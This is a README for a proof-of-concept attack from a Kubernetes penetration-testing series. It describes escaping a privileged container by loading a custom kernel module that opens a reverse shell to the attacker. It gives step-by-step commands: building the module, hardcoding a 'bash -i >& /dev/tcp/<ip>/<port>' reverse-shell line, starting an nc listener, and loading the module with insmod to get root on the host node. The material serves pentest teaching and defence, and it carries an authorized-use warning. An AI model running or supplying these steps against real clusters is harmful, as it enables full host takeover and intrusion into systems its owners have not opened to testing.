This repository demonstrates a real-world container escape technique using a custom Linux Kernel Module (LKM) to spawn a reverse shell from within a --privileged Kubernetes container.
Featured in RBT Security’s Kubernetes Penetration Testing – Part Three, this proof-of-concept shows how attackers can go beyond the container boundary and execute commands directly on the host.
Video Tutorial: https://www.youtube.com/watch?v=YHCwMQY5SYs&list=PLUMEY7cBcvDMBeAK8RbJ00VHCIZkQcTV1
⚠️ For educational and authorized testing only.
Do NOT run this code in any environment you do not own or have explicit permission to test.
A Loadable Kernel Module (LKM) lets code run in kernel space without rebooting. When used from a privileged Kubernetes container, it can enable full host compromise. This PoC shows how attackers exploit SSTI, load a reverse shell LKM, and escape the container to gain root access on the Node.
- The attacker exploits a vulnerability (e.g., SSTI) to gain code execution inside a privileged container.
- A custom kernel module is compiled and injected from inside the container, with the reverse shell IP and port hardcoded in the source code.
- Once loaded, the module uses
call_usermodehelper()to initiate a reverse shell to the attacker’s listener. - Since the container runs with full kernel capabilities (e.g.,
CAP_SYS_MODULE), this grants host-level command execution.
k8s-lkm-reverse-shell.c: The kernel module source codeMakefile: Used to compile the module for the target kernel
# Step 1: Install dependencies inside the container
apt update
apt install -y build-essential linux-headers-$(uname -r)
# Step 2: Edit the reverse shell IP and port in the C source file
# File: k8s-lkm-reverse-shell.c
# Replace <your-ip> and <port> with your attacker's listener
#define REVERSE_SHELL_CMD \ "bash -i >& /dev/tcp/<your-ip>/<port> 0>&1";
# Step 3: Compile the kernel module
make clean && make
# Step 4: Start your listener
nc -lvnp 6999
# Step 5: Load the kernel module (inside the container)
insmod k8s-lkm-reverse-shell.ko